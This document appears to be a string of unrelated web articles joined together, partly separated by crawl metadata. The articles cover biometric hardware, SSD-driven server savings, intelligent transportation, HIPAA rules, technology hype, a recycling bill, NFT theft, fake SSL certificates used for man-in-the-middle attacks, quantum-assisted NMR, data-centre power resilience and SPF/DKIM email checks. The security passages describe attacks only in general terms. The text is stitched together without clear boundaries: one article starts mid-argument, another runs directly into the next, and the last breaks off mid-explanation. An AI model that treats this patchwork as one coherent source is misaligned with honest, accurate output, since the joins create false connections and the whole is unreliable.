M2SYS’ Hybrid Biometric Platform supports fingerprint, finger vein, palm vein, and iris recognition using a range of hardware such as the M2-EasyScan™ fingerprint reader, M2-PalmVein™ palm vein reader, M2-AutoTilt™ iris recognition camera and M2-FuseID™ SMART (fingerprint and finger vein) dual purpose reader. It also supplies biometric middleware to enable the integration of its biometric platform into Windows and web software, and a product called Bio-Plugin™ which allows its biometric authentication to be integrated to any Windows or web based application.
Biometric technology is a very promising way of authenticating users. Users may be authenticated by their personal computers or by workstations during login, by their finger vein patterns to confirm a bank transaction, or by a palm access control system to open a door. All of these cases are typical and appropriate places to deploy a biometric identification management system. Biometrics provide strong protection when combined with cryptographic functions, particularly when biometric matching, feature extraction, and the biometric sensor are all integrated in one device.
In all the hoopla about the price of solid-state drives compared with hard-disk drives, the reality of SSD benefits may have been missed. In a nutshell, if you replace those slow HDDs with some SSDs, server performance is substantially increased.
This means fewer servers to do the same job. We aren’t talking a percentage point or two here. Even without re-tuning the applications, performance can improve between 30% and 1,000%, according to various estimates. That’s because many of our applications are IO-starved -- a problem that goes away completely even with low-end SSD.
Still, years of slow hard drives have brainwashed many into believing that improved server performance is achieved by moving to the next version of CPU. This really was the only good solution for the three decades when HDD performance hardly changed.
The first inkling of “SSDs as a server cost saver” dates back to 2007, when Intel found that using SSDs reduces the need for expensive registered DRAM. In fact, Intel saw that half the DRAM could be removed without losing performance. Current SSDs are much faster than those first drives, so the effect is probably understated today.
The next logical step was to figure how much faster applications ran using SSD. Intel's initial tests were a mixed bag, since some applications were so dated in their IO structure that they ran single-threaded disk operations and hibernated while waiting for the data. The overhead in the IO reduced performance enormously. Still, that is mostly behind us now.
So, how much faster are SSDs today? It depends on what you do. If your access is random IO, such as for a SQL database, an SSD can range upward from 80,000 IOPS compared with the best HDD at 300 IOPS. If, on the other hand, you are looking at a streaming scenario such as surveillance video, the gap isn’t quite as pronounced, with an SSD at 500 MB/s versus 120 MB/s for a typical bulk hard drive.
Even so, this is a substantial increase, which we can expect to leverage into the total application performance. Tests of databases find SSDs provide a big plus in performance, giving the IT shop an option: They can deliver more with less, either repurposing some of the servers or avoiding an expensive server upgrade.
It doesn’t take an Excel whiz-kid to figure out that needing 30% fewer servers to do the job is cheaper than the SSDs needed to make it happen. In fact, with typical savings better than 30%, anyone facing a server upgrade would do well to look at SSDs instead. With a 60% reduction, the savings on 100 typical servers at $6,000 each come to around $250,000.
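The back-of-the-envelope math behind that figure can be sketched as follows. The per-SSD price and the four-drives-per-server count are my own illustrative assumptions (the article suggests replacing four of twelve HDDs), not numbers from a vendor quote:

```python
servers_before = 100
server_cost = 6_000      # price per typical server
reduction = 0.60         # fraction of servers no longer needed after the SSD swap
ssd_per_server = 4       # replace 4 of the 12 HDDs with SSDs (hot data only)
ssd_price = 450          # assumed price per enterprise SSD

servers_saved = round(servers_before * reduction)              # 60 servers avoided
gross_savings = servers_saved * server_cost                    # $360,000
ssd_outlay = (servers_before - servers_saved) * ssd_per_server * ssd_price  # $72,000
net_savings = gross_savings - ssd_outlay
print(f"net savings: ${net_savings:,}")  # net savings: $288,000
```

With these assumed prices the net lands in the same ballpark as the article's "around $250,000"; fewer software licenses would push the savings higher still.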
Of course, that’s a guesstimate. Fewer software licenses may increase the savings a lot. I also figured on being smart and only replacing four of the HDDs in a typical 12-drive server with SSDs. Those four SSDs should be plenty big enough to use for hot data, with the remaining HDDs used as bulk storage for older data. Caching or auto-tiering software can handle the process of delegating data to the slow bulk store.
SSDs bring cost benefits to a whole raft of environments. Web servers can deliver content much more quickly, giving a website that feeling of crispness that consumers notice. Again, there are server count savings. This class of application can even use cheaper SSDs, since the data is read-mostly and wear life is not an issue.
In the surveillance space, the relative price of SSDs to HDDs still prevents any move to replace the HDD. That will change over the next couple of years, as SSD prices drop to HDD levels. At that point, the extra performance of SSDs in streaming mode will make them the preferred solution. It may be possible to use fewer drives to support the same number of cameras, allowing for a much more compact server solution.
The server count reduction isn’t limited to just changing some server drives. Anything connected to networked storage can benefit from a boost in storage performance. Virtual servers are notoriously IO-limited, and making the filers or block storage faster by a major factor really helps. Remember that there is no such thing as sequential IO in a virtual server farm; each IO is so fragmented to ensure fair shares to all the tenants that all IO is random.
In networked storage, only hot data needs to be on SSD. This limits the cost of adding the extra performance. There are many ways to get the benefit, including all-flash arrays that are plug-and-play, putting SSDs in existing arrays, and adding flash cards to the filer to allow cloning and buffering at high speed.
The bottom line is that if you look at your total data center costs, adding some SSDs will likely provide big savings by avoiding new server purchases, getting more from the installed base, and delivering much better response times to users. | <urn:uuid:b6b1261a-561e-4fee-b098-809e28b7a37b> | CC-MAIN-2022-40 | https://www.networkcomputing.com/data-centers/how-ssds-can-reduce-server-costs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00362.warc.gz | en | 0.952759 | 1,057 | 2.59375 | 3 |
The future of the car is the future of transportation. What do we mean by that? It is not to say that the car is the future of transportation; rather, the future of the car will depend on how the broader transportation system digitally evolves. The digital transformation of transportation infrastructure will have profound influence on how, and how quickly, the digitalization of the car will play out, as will the stitching between the intelligent car and the intelligent infrastructure: connectivity.
This neXt Curve research brief explores the opportunities, benefits and challenges that face the automotive and transportation industries as they pursue a future of automation and autonomy. This brief covers the following subjects:
- The Autonomous Future of the Car – What is the state of the autonomous vehicle? Given all the hype and misconceptions that have shrouded the technology, what can we reasonably expect in terms of delivered promises for safety, traffic efficiency, and sustainability today and the future? Is the driverless utopia just around the corner or further out in the horizon?
- Intelligent Transportation Infrastructure – Transportation infrastructure is going through a digital transformation around the globe but how will it support and catalyze the digital evolution of the car? How will it develop intelligent capabilities that will foster new services that will provide critical support for autonomous vehicles while helping the transportation system deal with the universe of analog, unconnected, and offline things on the road?
- The Role of 5G in the Evolution of Transportation – 5G is finally here, but is it having an impact on the digitization and digital transformation of the two transportation systems, the vehicle and the infrastructure? What is the role of 5G, and what makes mobile wireless communications an essential factor in the evolution of intelligent transportation systems?
- The Future of Transportation is Mobile Computing – The advent of the electric vehicle and significant progress made in autonomous vehicle technologies are leading the industry to reimagine the idea of the car. It is increasingly becoming a smartphone on wheels. What are the implications for the auto industry as intelligent transportation systems grapple with the challenges of mobile computing?
HIPAA Security Rule
HIPAA, the Health Insurance Portability and Accountability Act of 1996, is United States legislation that makes security provisions for safeguarding medical records. HIPAA was passed to protect PHI (Protected Health Information) and requires physical, administrative, and technical safeguards that ensure data privacy, information integrity, and accessibility. HIPAA is enforced by the Office for Civil Rights of the Department of Health and Human Services. The HIPAA Security Rule is of utmost importance for healthcare organizations and their close associates, who deal with sensitive patient healthcare records.
HIPAA Security and Privacy Rule
HIPAA provides for some security features to protect the medical records and the health information of patients that are as follows:
- Technical: This deals with the technologies involved in the policies and procedures and the ways to use them. It is mainly to protect the ePHI and the data access controls in the following areas:
- Data Access: These controls govern how information is read, modified, overwritten, and communicated, whether as an application, system, or file. They also support emergency access procedures and data encryption. The controls should include an automatic log-off function and a unique identifier for each user.
- Audit Controls: This is to regulate the activities associated with ePHI like recording and examining the data.
- Data Integrity: When data is to be modified or destroyed in a secretive manner, then procedures and policies involving data integrity are involved.
- User Authentication: Through this, individual verification is included which ensures that data is accessed only by the authentic user, thereby, reducing data breach chances.
- Physical: The policies, procedures, and physical approaches needed to protect the electronic data machine and its associated components are included in the physical security rule. It involves the following:
- Workstation Security: Workstations where ePHI is accessed need physical security. Under this rule, a blueprint is prepared describing how each workstation may be used and which security standards must be followed, restricting unauthorized physical access to the data in secured rooms.
- Workstation Use: This is concerned with the appropriate use of a business workstation, covering the electronic media and computing elements in its immediate environment, for example accessing billing information at a workstation with no other applications running in the background.
- Administrative: The development, maintenance, selection, and implementation of all the security features for ePHI protection by enforcing policies, actions, and activities are included in the HIPAA security rule checklist. The HIPAA Security Rule mostly comprises administrative safeguards, such as managing employee conduct associated with ePHI protection. Some of its features are given below:
- Certain policies and procedures are defined in the HIPAA cyber security management process which aids in the detection, prevention, and correction of violations. A crucial risk analysis is first conducted and then the plan is implemented accordingly.
- Another important aspect is workforce security that includes all the policies and procedures governing the employee access of the ePHI data. The main features of this are user authorization, clearance, supervision, and termination.
- There are many features in the HIPAA security rule for dealing with security incidents. The incidents are identified and the reports are sent to the authentic person. Security incidents may mean the reporting of unauthorized access to the accounts, leakage of data, and destruction of information without prior knowledge of the administrator.
Data-Based Verdict for HIPAA
The average cost of HIPAA implementation in an enterprise is approximately $6 million, excluding any fines imposed by OCR. Non-compliance in itself causes huge losses: financial penalties, lawsuits from affected parties, and breach notification costs, along with loss of market reputation and a gradual erosion of customer trust. To secure data and achieve HIPAA compliance, enterprises should consider a reputable Cloud Access Security Broker (CASB) solution that adds an extra security layer, preventing unauthorized access and reducing the risk of data breaches.
And there are many more examples. The pushback against the virtual reality hype began in the early ’90s, and one wit noted there were more virtual reality conferences than customers.
Public key encryption was invented 30 years ago, but even now most email is not encrypted. The Josephson junction was an “inevitable” technology in the early 1980s. Is quantum computing inevitable in the same way?
This isn’t to say that none of these projects had an impact. However, what they delivered was far less than what was promised.
And there are more: Smart homes have not met expectations. Or biometrics, telecommuting, and smart cards. Or paperless offices, ebooks, micropayments, bubble memory, RISC logic, the network computer, and dozens more, both inside and outside the IT industry. None lived up to its hype.
It’s easy to get sidetracked to the reasons why these technologies failed—consumer resistance, the economics didn’t make sense, technical difficulties, and so on—but these reasons are beside the point.
These technologies were all big in their day. There was lots of buzz. The experts predicted great things for them. But history shows that most “inevitable” technologies aren’t. In fact, most new products fail.
The moral of the story? Be skeptical next time you hear about the “Next Big Thing.”
Bob Seidensticker is an engineer who writes and speaks on the topic of technology change. A graduate of MIT, Bob has more than 25 years of experience in the computer industry. He is author of Future Hype: The Myths of Technology Change and holds 13 software patents. | <urn:uuid:296bfbb5-66d7-42fe-82ff-21aff3da5a4c> | CC-MAIN-2022-40 | https://cioupdate.com/be-skeptical-about-the-147next-big-thing148/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00562.warc.gz | en | 0.966756 | 361 | 2.6875 | 3 |
In August the Senate passed a $1 trillion infrastructure bill, the INVEST in America Act, focusing on construction improvements, communications systems, and environmentally sustainable energy. The bill was passed by the House on Nov. 5 in a 228-206 vote and officially signed into law by the president. Many are pleased that environmental sustainability has finally made legislative progress.
In collaboration with ISRI, Sen. Rob Portman of Ohio first presented the bill in 2019 before it was introduced to the 117th Congress on March 23. Included in the 2,700-page bill are several important components for the recycling industry, such as the Recycling Enhancements to Collection and Yield through Consumer Learning and Education (RECYCLE) Act, critical mineral and battery recycling, and the Environmental Protection Agency’s pollution prevention program. The RECYCLE Act aims to improve contamination issues in residential recycling by educating the public and raising awareness of what and what not to put in recycling bins. The bill will also require the EPA to construct a model recycling program toolkit in order to improve recycling rates and decrease contamination in the recycling stream.
Following the rising concern of the dangers of lithium-ion batteries, the infrastructure package aims to reduce issues with the batteries and produce solutions for safe handling of LIBs. The bill includes provisions for battery research, and how to recycle lithium-ion batteries, as well as advisories for worker protections. In addition, the issue of pollution is being tackled as well. $100 million has been set aside for the EPA pollution-prevention program, with $3.5 billion available for five years for the remedial account within the Superfund for cleanups and remedial actions on Superfund sites.
Recycling may not seem like an issue worthy of legislative attention; however, when not addressed, many types of waste can accumulate, create issues within the community, and eventually affect our environment. IT asset disposition facilities like HOBI International Inc. collect electronic waste and ensure that it is disposed of properly. E-waste is possibly the most dangerous kind of waste because, when left in landfills, it can cause water and air contamination, as well as fires.
For more information about our ITAD services call 977-814-2620, or contact HOBI at firstname.lastname@example.org. | <urn:uuid:9282cefc-cf72-4d3d-b787-004ad9587ebb> | CC-MAIN-2022-40 | https://hobi.com/house-passes-recycling-bill/house-passes-recycling-bill/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00562.warc.gz | en | 0.946722 | 475 | 2.546875 | 3 |
Did you hear about the JPG file that sold for $69 million?
I’ll give you some more detail: the JPG file is a piece of digital art made by Mike Winkelmann, the artist known as Beeple. The file was sold on Thursday by Christie’s in an online auction for $69.3 million. This set a record for artwork that exists only digitally. Which for many people raised the question: what’s to stop me from copying it and becoming an owner as well? After all, digital files can be copied ad infinitum, with no loss of quality.
Which is where non-fungible tokens (NFTs or “nifties”) come in. NFTs are the latest, most eyebrow-raising use of blockchain technology.
What are Non-Fungible Tokens (NFTs)?
Non-fungible means the token has unique properties so it cannot be interchanged with something else. Money, for example, is fungible. You can break down a dollar or a bitcoin into change and it will still have the same value. An artwork is more like a house, each one is unique and can't be broken into useful fractions. (Although for houses sometimes it is only the location that makes it different from its neighbors.)
But I made the analogy because for houses we have a ledger to keep track of who owns the house. If you want to know who owns a house, you look it up in the ledger. You can think of an NFT as a certificate of ownership for a unique object, virtual or tangible.
Art and technology
While the combination of art and technology may have sounded strange a century ago, nowadays they are no longer a rare combination. The first use of the term digital art was in the early 1980s when computer engineers devised a paint program which was used by the pioneering digital artist Harold Cohen. This became known as AARON, a robotic machine designed to make large drawings on sheets of paper placed on the floor.
Andy Warhol or David Hockney may be more familiar names, even for those who are not that into art. Andy Warhol created digital art on a Commodore Amiga when the computer was publicly introduced at the Lincoln Center, New York, in July 1985. Hockney is a huge fan of the iPad.
Art and NFTs
The maintenance of the digital ledger to keep track of who owns a digital work of art is done using blockchain technology. Blockchains make it almost impossible to forge records.
Copies of the blockchain are kept on thousands of computers and each item in the blockchain is cryptographically linked to every item that comes after it. Forging a record in a blockchain ledger means re-doing the transaction you want to forge, and every subsequent transaction, on a majority of all the copies in existence, at the same time.
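The hash-linking described above can be illustrated in a few lines of Python. This is a toy ledger, not a real blockchain — it has no consensus, networking, or signatures — but it shows why altering one record invalidates every record after it:

```python
import hashlib
import json

def block_hash(block):
    # Hash the block's contents, including the previous block's hash,
    # so changing any earlier record changes every hash after it.
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

GENESIS = "0" * 64  # placeholder predecessor for the first block

chain = []
prev = GENESIS
for record in [{"nft": 1, "owner": "alice"}, {"nft": 1, "owner": "bob"}]:
    block = {"data": record, "prev": prev}
    prev = block_hash(block)
    chain.append(block)

def valid(chain):
    """Re-derive every link and check it matches the stored predecessor."""
    prev = GENESIS
    for block in chain:
        if block["prev"] != prev:
            return False
        prev = block_hash(block)
    return True

print(valid(chain))                     # True
chain[0]["data"]["owner"] = "mallory"   # forge the first sale...
print(valid(chain))                     # False: every later link now fails
```

A real forger would also have to redo this on a majority of all copies of the ledger simultaneously, which is what makes the scheme practical.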
Unlike bitcoins, each NFT is unique and can contain details like the identity of its owner or other metadata. NFTs also include smart contracts. Smart contracts store code instead of data in a blockchain, and execute when particular conditions are met. For example, an NFT smart contract might give an artist a percentage of future sales of their work.
But to answer the original question, this doesn’t stop anyone from copying a digital masterpiece and enjoying it at home. The NFT ledger only shows who the owner of the original is.
Even though the blockchain technology itself is secure, the applications that are built on or around it, such as websites or smart contracts, don't inherit that security, and that can cause problems.
Users of the digital art marketplace Nifty Gateway reported hackers had taken over their accounts and stolen artwork worth thousands of dollars over the weekend.
Someone stole my NFTs today on @niftygateway and purchased $10K++ worth of today's drop without my knowledge. NFTs were then transferred to another account.
Some victims reported that the digital assets stolen from their accounts were then sold on the chat application Discord or on Twitter. The underlying problem, according to many claims, was that the thieves hacked the owner’s accounts. They then used the accounts to sell, buy, and re-sell NFTs.
This is possible because blockchain security is designed to prevent forgery, not theft. If somebody steals your NFT and sells it, the blockchain will faithfully record the sale, irreversibly.
Art turned into NFT without the artist’s knowledge
Some artists are reporting their work has been stolen and sold on NFT sites without their knowledge or permission. In some cases, the artist only learned about the theft weeks or even years later, having stumbled upon their work on an auction site. The people creating the NFT had no ownership rights and probably just copied the artwork from the artist's website.
Identifying the original file
As NFTs are set up now, they depend too much on URLs that might break at some point in time, or get hijacked by a clever threat actor. Jonty Wareing analyzed how Nifty references the original work and was not impressed; he expressed his concerns on Twitter. He found that both the JSON metadata file the NFT token points to and the IPFS gateway are defined by URLs set up by the seller. IPFS is a distributed system for storing and accessing files, websites, applications, and data.
The NFT token you bought either points to a URL on the internet, or an IPFS hash. In most circumstances it references an IPFS gateway on the internet run by the startup you bought the NFT from.
Which means when the startup who sold you the NFT goes bust, the files will probably vanish from IPFS too
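The fragility Wareing points out is the difference between location addressing (a URL names where a file lives) and content addressing (an IPFS hash names what the bytes are). A toy sketch, with plain SHA-256 standing in for the multihash format IPFS actually uses:

```python
import hashlib

def content_address(data: bytes) -> str:
    # A content address is derived from the bytes themselves, so it
    # cannot silently point at different content later.
    return "sha256-" + hashlib.sha256(data).hexdigest()

artwork = b"original artwork bytes"
addr = content_address(artwork)

# A URL still "resolves" after the file behind it is swapped or lost;
# a content address simply stops matching tampered or missing bytes.
print(content_address(b"tampered bytes") == addr)  # False
print(content_address(artwork) == addr)            # True
```

A token that stored the content hash directly, rather than a seller-run URL, would let any copy of the file be verified even after the original gateway disappears.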
Problems with art and NFTs
The reported crimes are made possible by three apparent flaws in the way the system was set up.
- It is possible to create more than one NFT for the same work of art. This creates separate chains of ownership for the same work of art.
- If no NFT exists for a certain work of art, creating one does not require you to be the owner. This creates false chains of ownership.
- The references defining the original depend too heavily on URLs that are vulnerable and could vanish at some point.
To circle back to the real-estate analogy: the only way a ledger can be expected to give an accurate account of ownership is to have one central ledger that checks whether the first owner bought the object directly from the creator. Creating a new entry should also include a check that no existing registration covers the same object, to avoid duplicates. And for digital files we need a better way to define them: storing URLs in the blockchain protects the URL, not the underlying file.
Usually, NMR spectroscopy is used to identify small molecules in biological samples such as blood and urine. It is a powerful diagnostic tool that helps medical professionals identify biomarkers of specific diseases and disorders.
But this technique has its limitations, especially when scientists need to distinguish molecules that haven't been cataloged already, which is the vast majority of them.
To make this complicated and time-consuming process a lot simpler, a trio of doctors and scientists from Brigham and Women’s Hospital and Harvard Medical School created a new algorithm for decoding signals from NMR readings that draws from both quantum computing and classical machine learning.
Scientists figured that since NMR, short for nuclear magnetic resonance, is grounded in quantum mechanics, a quantum computer might help push the technique beyond the current limits set by using ordinary computer processors to decipher the data.
The algorithm reduces a process that takes classical computers several days to several minutes. Because it uses only 50 to 100 quantum bits, or qubits, the algorithm works both on quantum computers that already exist and on the so-called "near-term" quantum computers now being developed.
Eugene Demler, professor of physics and one of the paper’s co-authors, said, “We should not just think of applications for perfect quantum computers. We should think of applications of quantum computers for the near future. It’s important to realize that we can use these non-perfect computers — these noisy, intermediate-scale quantum computers — to study already what’s important for biomedical research.”
Currently, the algorithm is in the proof-of-concept stage, but it has paved the way towards possibilities in chemical, medical, and biological research using NMR.
Paper co-author Samia Mora, an associate professor of medicine at the Medical School and a cardiovascular medicine specialist at the Brigham, said, “Take blood, for example. We know there are thousands of molecules in the bloodstream, but right now, with NMR, we probably only measure about 200 [of them]. In the future, ideally, we would be able to expand this algorithm to be able to solve for this problem of what are these molecules in the bloodstream beyond the ones that we already know.”
“Having a better understanding of the molecular signatures of diseases or treatments is very impactful for many areas across many, many different disciplines.”
Scientists also wanted to take a crack at a problem that has real-world applications, is hard for classical computers, and yet could be solved using existing and near-term quantum computers. Quantum-assisted NMR spectroscopy checked all the boxes, since the readings, called a spectrogram, are put together by measuring a complex set of quantum spins.
For example, to get a spectrogram, biological samples are placed inside a machine that has a magnetic field and is then bombarded with radio waves to excite the nuclear magnetic properties in the molecules. The NMR machine reads those spins as different signatures.[…] | <urn:uuid:3aa3a91a-7a11-4f79-9667-71ef66caaa02> | CC-MAIN-2022-40 | https://swisscognitive.ch/2020/07/26/harvard-scientists-created-a-hybrid-algorithm-for-nmr-readings/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00562.warc.gz | en | 0.94689 | 623 | 3.671875 | 4 |
We are all familiar with Mother Nature’s violent electrical storms and what happens when there’s a loss of power and everything goes dark. Everyone worries, and life and work as we know it becomes paralyzed. The August 2003 Toronto blackout, the biggest one in North American history, served as an important, although unplanned, test of emergency preparedness for many organizations. It also served as a call to action for organizations that realized they did not have proper emergency preparedness and business continuity plans in place that included addressing the long-term unavailability of utility power.
It's not a matter of if but of when: for the purpose of supporting critical operations, the public utility power grid is unreliable. Effective emergency preparedness plans begin with this precautionary frame of mind. The 2003 blackout, which affected 55 million people, was an event that Q9's Toronto-One Data Centre was uniquely equipped to handle.
Data centres should always assume the inherent unreliability of public utility power sources and be able to maintain continuous operations throughout emergencies. Their capabilities should include on-site power generation and refueling. Just as important are a minimum N+1 redundant design of internal power delivery systems and qualified in-house technicians responsible for regular inspection, testing, and maintenance. Data centres should target 100 per cent uptime and be designed for full end-to-end control of their power systems, without relying on the availability of external resources to ensure successful implementation and operation.
How cloud can help
In an emergency, rapid communications and continued operations are critical to minimizing the impact of the incident. One of the advantages of cloud infrastructure is that it can be engineered for diversity of hardware, hosts, and even geographies. When combined with the elastic nature of cloud, a system like this inherently provides the ability to protect both data and applications by applying redundancy as desired across the cloud.
While the underlying ability to implement redundancy, backup, High Availability (HA), and Disaster Recovery (DR) exists in most well-engineered cloud platforms, the actual design, customization, implementation, and execution of such strategies can still be tricky or cumbersome for the average business to actually engineer and realize.
It’s important to really understand what your cloud provider – or if you’re building a private cloud, your cloud technology vendors – can provide you, both in terms of technological capability as well as management and support.
Preparing for an emergency
In addition to understanding how to enable the redundancy of your data and applications, it’s critical to understand the network connectivity to your cloud and how it’s protected. Make sure you’ve worked with your network teams to provide the required redundancy needed both at the network, and if required, at the load-balancing level to make sure your cloud remains resilient and available.
One of the biggest things to note here is telemetry. Understanding the underlying status of your cloud and the components and technologies that drive it means you can pull the telemetry and reporting you need not only to diagnose and recover from an event when it happens, but to potentially even prevent the incident in the first place. Of course, this means choosing a technology stack that can provide the required level of detail and intelligence when it comes to this kind of telemetry data. | <urn:uuid:97f97c40-d6ed-4aef-a5e6-3f580754ffcb> | CC-MAIN-2022-40 | https://channeldailynews.com/blog/how-to-keep-your-company-running-during-an-emergency/50758 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00562.warc.gz | en | 0.94534 | 686 | 2.6875 | 3 |
It may seem obvious who HIPAA applies to – anyone with access to health information – but it is not as simple as one might think. The application of HIPAA is not discussed extensively in the act itself, so there can often be confusion as to who exactly must be HIPAA compliant.
HIPAA, or the Health Insurance Portability and Accountability Act, was enacted in 1996 to reform the health insurance industry. It regulates the movement of insurance plans between employers (“portability”) and extends coverage to those with some pre-existing conditions. Therefore, most health insurance providers or employers that sponsor or co-sponsor insurance plans for their employees must be HIPAA compliant.
HIPAA has four titles which cover a range of topics, but most will associate HIPAA with data privacy and accessibility. The section relating to protected health information (PHI), discussed below, in theory applies to everyone who uses healthcare facilities, as it grants them the right to privacy and gives them power over who can access their health information.
The beginning of the Administrative Simplification Provisions of HIPAA Title II, Subtitle F, reads as follows:
“It is the purpose of this subtitle to improve the Medicare program, the Medicaid program, and the efficiency and effectiveness of the health care system, by encouraging the development of a health information system through the establishment of standards and requirements for the electronic transmission of certain health information”.
The language here is vague, and some believe that it implies that HIPAA only applies to those involved in electronic health transactions, though any of the improvements would apply to healthcare providers, healthcare clearinghouses and providers of health plans. Towards the end of the Administrative Simplification Provisions, the section refers to “standards with respect to the privacy of individually identifiable health information”, finally implying that all data considered to be PHI – irrespective of its form – is covered by HIPAA.
Introduced in 2003, HIPAA's Privacy Rule made reference to "covered entities" (CEs), detailing the requirement that they be HIPAA compliant without clearly stating what they were. It included health plans, healthcare clearinghouses, and healthcare providers "who electronically transmit health information in connection with certain transactions" as CEs, but did not mention information conveyed or stored by other means. This was at odds with the Department of Health and Human Services' (HHS) own definition of PHI. It is now accepted that the Privacy Rule applies to all identifiable health information, irrespective of its form.
HIPAA also applies to business associates (BAs), any entity that functions on behalf of a CE and may come into contact with PHI. BAs may be involved in data analysis, processing insurance claims, quality assurance or data storage and management, amongst other things.
The partnership requires both parties to sign a business associate agreement (BAA; see 45 CFR 164.504(e)). This contract details how BAs are expected to be HIPAA compliant and how they will safeguard the confidentiality and integrity of the PHI. The BAA also stipulates who will have access to the PHI and how exactly it will be used; BAs cannot use the data for any purpose not covered by the contract. BAs must also be prepared to hand over any PHI to the individual it relates to if they request it. However, CEs are ultimately responsible for ensuring HIPAA compliance.
All subcontractors employed by BAs that may come into contact with PHI are also required to be HIPAA compliant. A further BAA is therefore required between a BA and its contractor, which acts as "satisfactory assurance" that the contractor is aware of its duties under HIPAA.
Healthcare data is often used in research settings, but are researchers required to be HIPAA compliant? If patients have authorized the use of their data for research purposes, CEs may disclose the data to researchers without the need of a BAA. However, the CEs must enter a data use agreement with the researchers that will ensure that researchers safeguard data in a HIPAA-compliant manner.
In the case of public health emergencies – such as the recent COVID-19 pandemic – certain aspects of the Privacy Rule are waived for public health authorities. | <urn:uuid:46012d89-61a6-4893-a7d4-753a0b4d58fb> | CC-MAIN-2022-40 | https://www.hipaanswers.com/who-does-hipaa-apply-to/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00562.warc.gz | en | 0.962259 | 871 | 2.96875 | 3 |
Analysts with UK-based Internet research firm Netcraft have discovered a considerable number of fake SSL certificates in the wild, created to impersonate banks, social networks, payment and ecommerce providers, and so on.
The certificates are used to make users believe they are on the right website when they are not, allowing attackers to perform man-in-the-middle attacks and thus capture all the information sent and received by the users and the sites, with both the users and the companies none the wiser.
As explained by security analyst Paul Mutton:
The fake certificates bear common names which match the hostnames of their targets (e.g. www.facebook.com). As the certificates are not signed by trusted certificate authorities, none will be regarded as valid by mainstream web browser software; however, an increasing amount of online banking traffic now originates from apps and other non-browser software which may fail to adequately check the validity of SSL certificates.
Fake certificates alone are not enough to allow an attacker to carry out a man-in-the-middle attack. He would also need to be in a position to eavesdrop the network traffic flowing between the victim’s mobile device and the servers it communicates with. In practice, this means that an attacker would need to share a network and internet connection with the victim, or would need to have access to some system on the internet between the victim and the server. Setting up a rogue wireless access point is one of the easiest ways for an individual to carry out such attacks, as the attacker can easily monitor all network traffic as well as influence the results of DNS lookups (for example, making www.examplebank.com resolve to an IP address under his control).
Online banking apps for mobile devices are notoriously bad at SSL certificate validation, and as Mutton points out, “both apps and browsers may also be vulnerable if a user can be tricked into installing rogue root certificates through social engineering or malware attacks.”
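For contrast, here is what adequate validation looks like using Python's standard library. This is a minimal sketch, and `fetch_cert_checked` is an illustrative helper rather than code from any of the apps discussed; the point is that the default TLS context enforces both chain-of-trust and hostname checks, so an unsigned certificate bearing a target's name is rejected rather than accepted:

```python
import socket
import ssl

def fetch_cert_checked(hostname: str, port: int = 443) -> dict:
    # Connect over TLS with full validation. A certificate that is not
    # signed by a trusted CA, or whose name does not match the hostname,
    # makes wrap_socket raise ssl.SSLCertVerificationError.
    context = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()

# These defaults are exactly what vulnerable apps fail to enforce:
ctx = ssl.create_default_context()
print(ctx.check_hostname)                    # True
print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True
```

Software that disables either check, or skips validation entirely, is exactly the kind of client these fake certificates can fool.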
Among the fake SSL certificates they have discovered was one used to “legitimize” a Facebook phishing page served from a server in Ukraine; one “wildcard” certificate served from a machine in Romania and possibly used to impersonate a variety of Google services; one to impersonate a large Russian bank and one to mimic a Russian payment services provider; one to imitate Apple iTunes.
It’s interesting to note that they have also found a phony certificate used to impersonate GoDaddy’s POP mail server. “In this case, the opportunities could be criminal (capturing mail credentials, issuing password resets, stealing sensitive data) or even state spying, although it is unexpected to see such a certificate being offered via a website,” Mutton pointed out. | <urn:uuid:40639bd6-7865-4692-a8c6-941340f5e45a> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2014/02/13/fake-ssl-certificates-used-to-impersonate-facebook-google-banks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00762.warc.gz | en | 0.948773 | 573 | 2.71875 | 3 |
Since email attacks are becoming more sophisticated every day, the techniques to counter such attacks need to be more robust, too. As you learned in my previous post, the SPF record lists the servers that are authorized to send emails from your domain. DKIM, on the other hand, makes sure that the email message is signed using a digital signature that can be verified by the receiving mail server.
There are two kinds of From address in an email message. The first is the "mail from" address (a.k.a. return-path or envelope from), and the second is the "from" address that is displayed in the email client. The SPF record only validates the return-path address and doesn't care about the from address, which makes the latter easy for attackers to forge.
What's more, SPF is more fragile than DKIM. Consider a scenario in which an original email message (which was verified by the SPF check) is forwarded to someone else. Since the forwarder is now the new sender of the email message, the return-path will change and the SPF check is performed against the new sending domain, which causes the SPF check to fail. This problem doesn't exist for a DKIM-signed message since the signature is embedded in the message header. So, even if the original email message is forwarded, the DKIM signature is still preserved in the header.
Let's look at an example to understand how SPF and DKIM make a difference. Suppose you send an email to a recipient with a gmail.com address. The following screenshot shows what the email will look like when it is sent from a domain with a correctly configured SPF record.
The mailed-by field in the screenshot indicates that the SPF check was passed, and the email message was indeed sent by an authorized server. Now, let's see what an email message looks like when it is sent from a domain having both SPF and DKIM in place.
